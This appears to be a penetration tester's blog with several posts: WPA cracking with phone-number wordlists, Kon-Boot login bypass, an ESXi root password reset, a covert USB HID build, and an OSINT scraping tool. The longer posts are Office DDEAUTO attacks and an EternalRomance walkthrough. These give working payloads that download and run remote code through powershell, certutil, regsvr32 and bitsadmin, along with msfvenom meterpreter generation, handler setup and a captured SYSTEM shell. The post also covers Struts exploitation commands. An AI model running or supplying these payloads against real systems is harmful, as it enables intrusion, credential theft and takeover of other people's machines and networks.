Cracking WiFi – phone number wordlist

I used to see alot of networks setup and either the tech or the end user choosing the person/business’s phone number as the password. So I usually try to test these first when trying to crack a WiFi password.

I was looking into more efficient ways to crack the password if you were working in a virtual machine and didn’t have access to a GPU cracking rig to utilize hashcat. You could pipe crunch to aircrack-ng on the fly and reduce some keyspace by prepending the area code :
crunch 10 10 -t 860%%%%%%% | aircrack-ng /root/handshake.cap -e MyESSID -w-
This results in testing 10 million different numbers.But you can reduce that keyspace and avoid unnecessary CPU time by pre-generating a wordlist with all the numbers and then removing the exchange prefixes that aren’t in use.

NANP (North American Numbering Plan) numbers are ten digits in length, and they are in the format: NXX-NXX-XXXX Where N is any digit 2-9 and X is any digit 0-9.
So removing any prefix that starts with 1 or 0 and and any service prefix N11 (i.e. 411,911 etc..) can be removed too, reducing this keyspace. Checking online databases of exchange listings for each state will you to allow the keyspace even further by removing unused/reserved.
Also, as of September 2016, all 555 numbers have been returned to the NANPA inventory except 555-1212 (national use directory assistance) and 555-4334 (national use assigned.) The fictitious, non-working numbers, 555-0100 through 555-0199, will remain reserved for entertainment/advertising.
So we will keep that in mind that we can remove another 102 entries per area code with the regex:
^86055501[0-9][0-9]|^8605551212|^8605554334
Connecticut doesn’t use the 555 prefix currently though so were going to just remove all of the 555 prefix, so by using crunch again and some regex grep’ing:

crunch 10 10 -t 860%%%%%%%>860.txt
cat 860.txt | grep -vP "^860[0,1]|^860[2,3,4,5,6,7,8,9]11\ |^860[2,3,5,6,7,9]00|^86093[1,4,6,7]|^86095[0,8,9]|^860555\
|^86096[0,9]|^860976|^86098[0,1]|^86099[4,6]|">860numbers.txt
This knocks the results down to:
wc -l 860.txt 860numbers.txt
10000000 860.txt
7710000 860numbers.txt
reduced keyspace = 2,290,000

Now you’re thinking , shit there’s usually more than 1 area code per state. So for Connecticut there is 203, 860, 475, and 959. 959 doesnt have any exchanges yet afaik, 475 exchanges are relatively small currently, and 203 actually has more exchanges in use than 860. So we just do the same thing for 203:

crunch 10 10 -t 203%%%%%%%>203.txt
cat 203.txt | grep -vP "^203[0,1]|^203[2,3,4,5,6,7,8,9]11\
|^203[2,3,5,6,7,9]00|^203203|^203475|^203555|^203700\
|^203860|^20395[0,8,9]|^203976|^203999">203numbers.txt

This knocks the results down to:
10000000 203phonenumber.txt
7770000 203.txt
reduced keyspace 2,230,000

After doing this for each area code, you can cat the files together to create a wordlist that you can pipe to aircrack-ng or john the ripper. If you’re a lazy reader from Connecticut, I am attaching the compiled wordlist ::allctphonenumbers.zip (16.7mb):: of all 860/203/475 area codes (15,760,000 total).

It shouldn’t take a relatively long time to test against a captured handshake to see if they used phone number for the password. Using the 203 area code wordlist it took about 12 minutes, because it basically starts at the beginning phone number (i.e. 2032000000)
aircrack-ng -w /root/ctphonenumbers203.txt /root/handshake.cap -e MyESSID

Or you can use John the Ripper, first convert the cap file using:
hcxhash2cap --pmkid=test.16800 -c handshake.cap
then
john -w:allctnumbers.txt --format=wpapsk --pot=pmkid.cracked.pot test.16800

took about an hour on a vm to run through both area codes and crack it


If you are lucky to be able to use hashcat, the remaining number goes pretty quick with a good GPU, but also you can help to reduce the keyspace using charsets. Which the charset going through 7 digits took about 1 second to crack.

PMKID
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d -w 4 --force -O
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 860?1?d?d?d?d?d?d -w 4 --force -O

WPA/WPA2
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 860?2?1?1?1?1?1?1 -w 4 --force -O
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 203?2?1?1?1?1?1?1 -w 4 --force -O

Yes, cracking WPA-PMKID with a wordlist can be slow
with the 203 wordlist it took 53 seconds to crack
bruteforcing PMKID with a charset mask with GPU took one second 🙂
hashcat -m 16800 pkid.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d –force

So wordlists aren’t that great but if you’re stuck on a sub par PC and need something in a pinch its worth it to try before you try using larger wordlists etc. I’m writing this just for notes at 6 am, and suck at math, so let me know if I have any mistakes in the calculations etc.. in the comments. Will be doing a follow up article on how to capture PMKID’s on vulnerable targets.
Happy cracking.


Kon-Boot

Kon-Boot password tool

Kon-Boot is an awesome tool that I’ve used extensively with tech jobs that I’ve had in the past (it’s been around since 2009), for clients that couldn’t remember their password :/ or a employee that was fired etc… Most recently Red-Team pentest engagements when I’ve had physical access to a box and needed quick and stealth access. It allows accessing a target computer (Windows/Mac OSX) without knowing the user’s password.

Kon-Boot does not need to remove or modify the user’s password and all changes are reverted back to previous state after system restart unlike other tools that just remove/modify the password and is currently the only solution that I know of that can bypass Windows 10 online passwords.

Their latest versions (since 2.7), lets me run PowerShell scripts on Win8/10 machines, which allows me to automate data exfiltration or add persistent access quickly onto the box. The Sticky Keys escalation feature (spawns a system prompt before logging in by pressing shift key 5 times) allows for quick access to system-level resources without worrying about user’s level access or group policy.

Supported operating systems:

Microsoft Windows systems (both x86 and x64) :
   XP, Vista, 7, 8/8.1, 10, Server 2003/2008

Apple OSX / macOS systems:
   Apple OSX 10.7-10. 11
   Apple macOS Sierra (10.12)
   Apple macOS High Sierra (10.13)
   Apple macoS Mojave (10.14)

Links:
https://kon-boot.com
 http://thelead82.com
 https://www.piotrbania.com/all/kon-boot/

Tutorials: https://kon-boot.com/docs/
Twitter: https://twitter.com/thelead82

ESXI 6.7 Password recovery / reset

Recently I had done some training where we setup ESXI 6.7 on a Intel NUC. It’s been over a month since I’ve touched it. Apparently during the training my coworker had set a root password for the install, which was supposedly written down, but was either typed wrong in the notes or fat-fingered while setting it. Unfortunately, you can no longer boot into single user mode or Service Console to reset the password and VMware suggest you reinstall ESXI to reset the password. I didn’t want to risk trying that method because I wasnt sure if it would affect the currently installed VMs and I didn’t have a copy of ESXI with me to do so. Instead I used a bootable Kali USB to mount the ESXI drive and reset the root password to a blank password by editing the shadow file.

Here’s the steps I took to gain access to my ESXI NUC.

First, I checked the drives on the machine using the lsblk command. Then used udiskctl to mount nvme0n1p5. Once mounted, I copied the state.tgz file to /tmp then untar’d it. It had another .tgz file called local.tgz inside which I untar’d too using this command:
tar -xf state.tgz && tar -xf local.tgz

I then used nano to edit the root password in the shadow file that was now in the /etc folder using nano etc/shadow. (I also saved the hash also because I wanted to try to crack it regardless with hashcat to see what the hell it was)

Basically remove everything between the colons after the username so i looks like the image below

After saving the file I tar’d it back up and moved it back to the mounted directory, then rebooted and removed the Kali USB.

Upon rebooted I was greeted with the ESXI logon screen, and was able log in with root and a blank password.

Here’s the plaintext output just in case you can get online from your device and want to copy pasta.

root@kali:/mnt# lsblk
NAME        MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
loop0         7:0    0   2.9G  1 loop /usr/lib/live/mount/rootfs/filesystem.squashfs
sda           8:0    1  29.3G  0 disk 
├─sda1        8:1    1   3.1G  0 part /usr/lib/live/mount/medium
└─sda2        8:2    1   736K  0 part /media/root/Kali Live
nvme0n1     259:0    0 465.8G  0 disk 
├─nvme0n1p1 259:1    0     4M  0 part /media/root/ESXi
├─nvme0n1p2 259:2    0     4G  0 part /media/root/4E99-06DA
├─nvme0n1p3 259:3    0 458.4G  0 part 
├─nvme0n1p5 259:4    0   250M  0 part 
├─nvme0n1p6 259:5    0   250M  0 part /media/root/4E99-06D71
├─nvme0n1p7 259:6    0   110M  0 part 
├─nvme0n1p8 259:7    0   286M  0 part /media/root/4E99-06D72
└─nvme0n1p9 259:8    0   2.5G  0 part 
root@kali:/mnt# udisksctl mount -b /dev/nvme0n1p5
Mounted /dev/nvme0n1p5 at /media/root/4E99-06D7.
root@kali:/mnt# cp /media/root/4E99-06D7/state.tgz /tmp
root@kali:/mnt# cd /tmp
root@kali:/tmp# tar -xf state.tgz
root@kali:/tmp# tar -xf local.tgz 
root@kali:/tmp# rm *.tgz
root@kali:/tmp# nano etc/shadow
root@kali:/tmp# tar -cf local.tgz etc/
root@kali:/tmp# tar -cf state.tgz local.tgz
root@kali:/tmp# mv state.tgz /media/root/4E99-06D7/
root@kali:/tmp# udisksctl unmount -b /dev/nvme0n1p5
Unmounted /dev/nvme0n1p5.
root@kali:/tmp# reboot

Covert Lighter HID Attack Tool

On Twitter about a month ago @jermainlaforce had an awesome idea of hiding a USB HID device inside a lighter case, using one of those cheap Chinese spycams you can find on ::ebay:: for $5. HID attack tools are nothing new, here’s a video of one I made in 2011 using a Teensy board (Turn down your volume)

All you need to do is open the top of the case and gut the insides, then replace the hardware with a USB (WHID, Ducky, Digispark, Teensy etc..). I also ended up ordering one because I figured I’d recycle the camera guts for another upcoming red team engagement I have coming up to monitor a dropbox location. The process is fairly simple and straight forward to build this out.

I decided to use a Digispark board because you can also get cheap knockoff ones on ::ebay:: too for like $1.50, I have a bunch of these laying around from various projects and it’s cheap, the whole project cost about $6.50. The camera button ended up broken during shipping so i ended up just ripping it all apart by yanking the USB metal to pull out the guts from the case. (it had a dab of some glue to hold it tight)

I then de-soldered the USB connector from the camera board to reuse on the Digispark board since it has one of those on-board USB connectors

I then soldered it to the Digispark going 1to1 with the pins to the board

Replaced the top portion that holds it to the case, and added some hotglue to keep it from wiggling around inside

Slide everything back together and you’re golden.

Depending on which dev board you used I have some example payloads on my ::github:: to get you started with some attack ideas.

Telephreak Tactical Lunchbox


One of the cooler swag I received @ Defcon this year was a lunchbox for the Telephreak party, filled with candy, gadgets, and toys from telephreakbadge. I do some ‘red teaming’ occasionally and always had my stuff all janky in my backpack with no way to really keep it all pretty and was a pain in the ass to go through everything to find what tools I needed. Plus stuffing them all in a box tends to get shit broken eventually. I was thinking I needed something like a pelican box but I didnt feel like spending a huge amount on something simple. So I was thinking one day that this lunchbox sitting on my desk would do the trick. I ended up getting a few pieces of Polyethylene off ebay for $9, They arrived pretty quick and i spent about an hour or so arranging some of my most used tools onto each layer and cutting out the foam to fit them all in. I used a small knife (the ones that have a knife/scissor/toothpick) and a razor blade to cut out the foam. Here’s all 3 layers that fit inside with descriptions of each tool’s usage.

Layer 1

with an acrylic case, highly customizable USB attack platform (HID,Network Etc…)

Layer 2

  • Hak5 WIFI Pineapple – various wifi attack tools
  • Firefighter Swipe Tool – open doors
  • DigiSpark DigiStump attiny85 dev board – cheap rubber ducky alternative that you dont have to worry about losing
  • Hook Tool – open some door latch bolts

Layer 3

as a bonus my Asus Nexus 7 loaded with Kali Nethunter also fits inside

skiptracer

My new open source python OSINT framework, skiptracer was released @ HushCon East on June 1st. Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Using some basic python webscraping of PII paywall sites to compile passive information on a target. The modules will allow queries for phone/email/screen names/real names/addresses/IP/Hostname/breach credentials etc.. It will help you collect relevant information about a target to help expand your attack surface.`Everyone should be encourage to submit new ideas/modules. You can get the code here: https://github.com/xillwillx/skiptracer feel free to submit new modules or code fixes.

Office DDEAUTO attacks

Sensepost posted 10 days ago about a vulnerability which can trigger command execution, without use of macros, when someone opens a specially crafted Office document. Although a little bit of social-engineering needs to come in play for the victim to click ‘yes’ to the first 2 of 3 message boxes, most end-users are easily tricked. They found that by abusing the parameters of the DDEAUTO function that they could use powershell to download malicious payloads remotely. DDE is a legacy Inter-Process Communication (IPC) mechanism dating back to 1987, which establishes a dynamic data exchange (DDE) link with a document created in another Microsoft Windows-based program, (new information becomes available in a linked document, a DDE field inserts new information when you update the field). SensePost discovered that instead of specifying an application like Excel, an attacker can specify arbitrary parameters of another application as the first parameter, and quoted arguments as the second parameter (which cannot exceed 255 bytes).

Although Sensepost just demonstrated this using Word, they left other ideas up to the reader. There has been other ways being thrown around on Twitter over the past week, on a bunch of ways to accomplish code execution in Word, Excel, and even Rich-Text based Outlook emails. I’ll go over some of the items I have been able to test successfully in my lab.

The quick and easy test:
Open new word document, press CTRL+F9 key, and paste this between the {} brackets then save the file
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

You should have something similar that looks like the image above.

Payloads:
Although popping calc is cute and all for demo purposes, you can do more mischievous things to execute malicious payloads on a target system.

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\\Windows\System32\cmd.exe /c cscript.exe index.js"

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll "

DDEAUTO c:\\windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe"

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e "

I’ve also created a bash script that uses CactusTorch to automatically generate reverse TCP/HTTP/HTTPS meterpreter payloads in vbs/hta/js that you can insert into Word documents for testing. https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

Also I’ve seen in the wild that you can you can obfuscate the messagebox contents furthering your social-engineering attempts to trick the user into clicking yes.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

Although powershell webdl scripts are easier to do you might want to have your payload all in one document so its not calling out for your binary over the network. Dave Kennedy updated his Unicorn python script to generate a msfvenom meterpreter payload that gets base64 encode/decoded when the DDEAUTO is triggered. Dave recently updated some fixes I sent to him along with the way obfuscate the messageboxes.
Open a console in Kali

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
git clone https://github.com/trustedsec/unicorn.git && cd unicorn
python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
cat powershell_attack.txt  | xclip -selection clipboard | leafpad powershell_attack.txt 

Paste your cat'd payload into Word and save it, then to send to your target. Then in a new console window open your metereter handler to recieve some shells.

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"

* if you need your external IP change the first line of code to:
IP="$(dig +short myip.opendns.com @resolver1.opendns.com)"

Outlook:
You can also trigger this with an Outlook Rich Text email message, the only caveat on Outlook 2013/2016 being that you need to embed an image/chart/object into it first before adding the DDEAUTO payload.
Open new word document, press CTRL+F9 key, and paste your payload between the {} brackets, then open a new Outlook email message. Go to the Format Text tab and change the message to Rich Text formatting.

In the body of the message copy and paste any image into the body.

From your Word Document copy your DDEAuto payload, then paste that into the body of the email. Enter the recipient etc and send. You'll get the DDE messages, just say no to them. When your recipient receives the email, it wont trigger until they press reply. If they press yes to the first 2 messageboxes then it'll execute your payload.

Calendar Invites:
Another attacker vector would be recurring Calendar invites. Every time the target opens it they get re-owned.

Mitigations:
This has been tested to work on doc(x/m), dot(x/m), rtf, Word xml, draft msg & oft files. Although the underlying parsing using Word triggers this behavior when these file types are opened. Microsoft responded that it is a feature and no further action will be taken to fix (unless of course the current ransomware attacks and other viruses force their hand).
wdormann made a quick .reg gist hack that will help disable DDEAUTO in the registry, although it does break some things in OneNote.

Nviso made some YARA rules to detect DDE also

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
  
rule Office_DDEAUTO_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
  condition:
    $a
}
  
rule Office_DDE_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee]\b.+?/
  condition:
    $a
}
 
rule Office_OLE_DDEAUTO {
  strings:
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
 
rule Office_OLE_DDE {
  strings:
    $a = /\x13\s*DDE\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a

Exploiting with EternalRomance using Metasploit installed inside Win10 WSL

This post will have a few sections. We will get some general information of the ETERNALROMANCE exploit, learn how to install WSL on Win10 Creators Update, along with Metasploit. As a bonus I will show how to do this on Kali, and show a few different additional tricks to download payloads to the target machine.

The original ETERNALROMANCE is a remote code execution (RCE) exploit targeting legacy SMBv1 that came from a leak on April 14, 2017, by a group calling themselves the Shadow Brokers. It was part weaponized exploit collection attributed to NSA and Equation Group called Lost_In_Translation, which targeted Windows XP/Vista/7 and Windows Server 2003/2008. It takes advantage of CVE-2017-0145, which has been patched by the MS17-010 security bulletin. File sharing over SMB is normally used only within local networks, if an attacker has access to a vulnerable endpoint running SMB the can gain SYSTEM privileges. ETERNALROMANCE takes advantage of a bug in access to named pipes, more in depth information can be found here.

The original exploit required that you generate shellcode using DoublePulsar which was also in the dump. There has been a few posts demonstrating this when the it first hit the net. But, being limited to their shellcode, and if you tried to use other shellcode the exploit would blue screen the target machine. Also you were not able to exploit any newer machines above Server 2008.

We will be using some updated python code from sleepya that fixes some issues (BSOD) with the original code of ETERNALROMANCE’s and allows compatibility to exploit Windows 2000/XP/Vista/7/8.1/2008 R2/2012 R2/2016 R2.
ETERNALROMANCE requires authentication, either through a Guest account, if it’s enabled, otherwise, we would have to previously obtained a username and password from the target machine. For this demonstration we will assume the target machine has Guest enabled. *Even if it is a Guest account, the exploit gives us SYSTEM privileges.

To start off I am going to assume you already have the Creators Update installed on Windows 10 (which solves some issues on WSL with ping finally, but Nmap is still jacked up :/ ).

Installing WSL Ubuntu:

Turn on Developer Mode
Open Settings -> Update and Security -> For developers
Select the Developer Mode radio button


Open a command prompt. Run bash

Accept the license, the Ubuntu image will download and install.

Launch a new Ubuntu shell by running bash from a cmd or powershell prompt or by typing bash in the start menu and clicking it. Create a new user and password,
then run sudo apt-get update && sudo apt-get upgrade -y since the image will be behind. You should be ready to go to install Metasploit now.


Installing Metasploit:

Most of this info I borrowed from Darkoperator’s blog post since essentially it’s the same idea of installing Metasploit on Ubuntu. You want to disable Window Defender and also add an exclusion to %userprofile%\AppData\Local\lxss inside Windows Defender’s settings otherwise it might break the install of some of the payloads etc that are detected. In your bash window you’re going to paste all these commands and make sure you dont get any errors.

sudo add-apt-repository -y ppa:webupd8team/java
sudo apt-get update
sudo apt-get -y install oracle-java8-installer
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc

git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v

Right about this time you’ll want to get some coffee or Monster because ruby is going to a long time to finish. Once finished it should post the version that installed. Now were going to skip a few steps like setting up postgresql and Nmap because we wont need a DB now and Nmap is not working currently in WSL. So lets move on to getting Metasploit installed.

cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

So hopefully at this point you should have Metasploit installed. You can test it by typing msfconsolein the bash prompt.


Exploiting the Target
Now comes the easy part, I’ll give you some easy commands you can type in 3 different bash windows. Open the windows one at a time , the Metasploit handler will take a bit to startup, so you can open a second window and create a msfvenom payload, which will also take a little bit to finish creating and encoding. Once both of those are finished, open a 3rd bash window and paste the commands, it should download the EternalRomance python and smb.py to help exploit our target and should automagically change your IP and our new download payload using sed to replace the default stuff. I chose to use certutil to download our msfvenom meterpreter payload from our python SimpleHTTpServer and then execute it.

With your open msconsole window test our target IP first to see if it’s exploitable:
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

if your target machine is exploitable then continue with the next step of opening the 3 bash windows. you can also choose to use any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc… when using EternalRomance.py in window 3 (i chose ‘netlogon’) also dont forget to change the to your target’s IP.


Bash Window #1 – MetaSploit Handler

IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

Bash Window #2 – Created msfvenom payload and started python webserver
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -e shikata_ga_nai -i 3 -f exe > 1.exe
sudo python -m SimpleHTTPServer 80

Bash Window #3 – Download EternalRomance, edit it, & exploit victim
IP=`ifconfig wifi0 | grep "inet addr" |awk -F: '{print $2}'| awk '{print $1}'`
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c certutil -urlcache -split -f http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

python EternalRomance.py [TargetIP] netlogon


If all goes well you should see a new meterpreter session open from your target. 🙂


Kali VM EternalRomance exploiting info:

It will be just about the same and the information above except few a different commands…

#1. – Test Target IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS [TargetIP]
exploit

*choose any pipe name ‘netlogon’, ‘spoolss’, ‘browser’ etc…

#2 – Create Metasploit Handler
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

#3. – Grab Exploit Scripts in console 2
wget https://www.exploit-db.com/download/42315-O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py

#4a. – Payload Choice #1 – Create EXE payload using bitsadmin dl and execute
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

#4b. – Payload Choice #2 – Create SCT payload with regsvr32 dl with scrobj.dll
git clone https://github.com/CroweCybersecurity/ps1encode .
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py

Credits for this regsvr32 payload idea:Sheila Berta / Casey Smith / CroweCybersecurity
#5. – Start Webserver
service apache2 start

##################################
# Exploit it(change the TargetIP and named pipe if you want)
python EternalRomance.py [TargetIP] netlogon

If all goes well a shell shall rain down on ya.
[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

If I missed anything or something needs correcting hit me up on Twitter.

Equihax


In July, CVE-2017-9805, was reserved for the Apache Struts RCE vulnerability in the REST plugin. Apache Struts 2.5 through 2.5.12 that are using REST plugin are vulnerable to this attack. It had an initial disclosure on 7/17/2017, and a patch was released recently on 9/5/2017, with Apache updating Struts to version 2.5.13 was released. The flaw exists in using the Struts REST plugin with XStream handler to handle XML payloads. If exploited correctly, it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it. The problem occurs in XStreamHandler’s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object. lgtm has in in depth article along with a press release from Apache Foundation. The company Lgtm, who discovered the CVE-2017-9805 vulnerability, had warned that at least 65 percent of Fortune 100 companies use Struts, and they could all be exposed to remote attacks due to this vulnerability.

Equifax, one of the “big-three” U.S. credit bureaus was most likely, and unfortunately, not watching the bleeding-edge of security to prevent their server from being compromised. When they discovered the “unauthorized access” on July 29, they called in the security team from Mandiant to help them figure out the fallout of having potentially 143 million people’s PII released to the hackers. They released a video on September 7th, urging people to sign up on equifaxsecurity2017.com, which it itself was a shitshow, along with it being a poorly coded site, it was also flagged as a phishing site and didn’t even seem to be looking up the data correctly, with people using false info and still getting the same response from the site as a real account would. I’d be weary to submit my information to that site, along with some reports that the wording in the site gives them a loophole on you not being able to be part of a class action lawsuit if that ever comes to fruition.
. Below is a video from the CEO of Equifax about the incident.


Rick Smith, Chairman and CEO of Equifax Inc., on cybersecurity incident involving consumer information. Equifax has established a dedicated website, www.equifaxsecurity2017.com, to help consumers determine if their information has been potentially impacted and to sign up for credit file monitoring and identity theft protection.


There’s been speculation that this Struts vulnerability is how Equifax were owned. Looking into how the exploit can be recreated shows how easy it is for an attacker to take control of a server. The team from Metasploit created a module to trigger the CVE-2017-9805 vulnerability that was released shortly after its disclosure.

For those who would like to try this out at home in your ‘test’ lab, you can quickly test this out against your test server on a linux box, like using the Kali distro.
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rbcp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/ run msfconsole and load the module by running
use exploit/multi/http/struts2_rest_xstreamshow options

Someone also anonymously released this gist on github the same day showing how you can simply exploit Struts.

Mazin Ahmed released some python code on his github that allows you to check for a vuln server or list of servers easily
Checking if the vulnerability exists against a single URL.python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'Exploiting a single URL.python struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/struts-pwn'

So make sure you patch your server if you’re running Struts, if you dont have a webserver running Struts, then all you have to do is worry about your Identity being stolen if you’re an American.
Sign up for credit monitoring if you can, and then freeze your credit files at the major credit bureaus. Information for how to file a freeze is available here.

CVE-2017-0213 – Windows COM EoP

Wrote another blog post for Milton Security about details of a vulnerability that James Forshaw of Google Project Zero found in January, that exploits a bug in Windows COM Aggregate Marshaler. An attacker can use this bug to elevate privileges on Windows machines.

Microsoft had 90 days to patch, which they have with last month’s security updates. The post includes a proof of concept code for 32 and 64 bit versions of Windows from Win7-10 and Server 2k8-2k16.
https://www.miltonsecurity.com/company/blog/cve-2017-0213-windows-com-privilege-escalation-vulnerability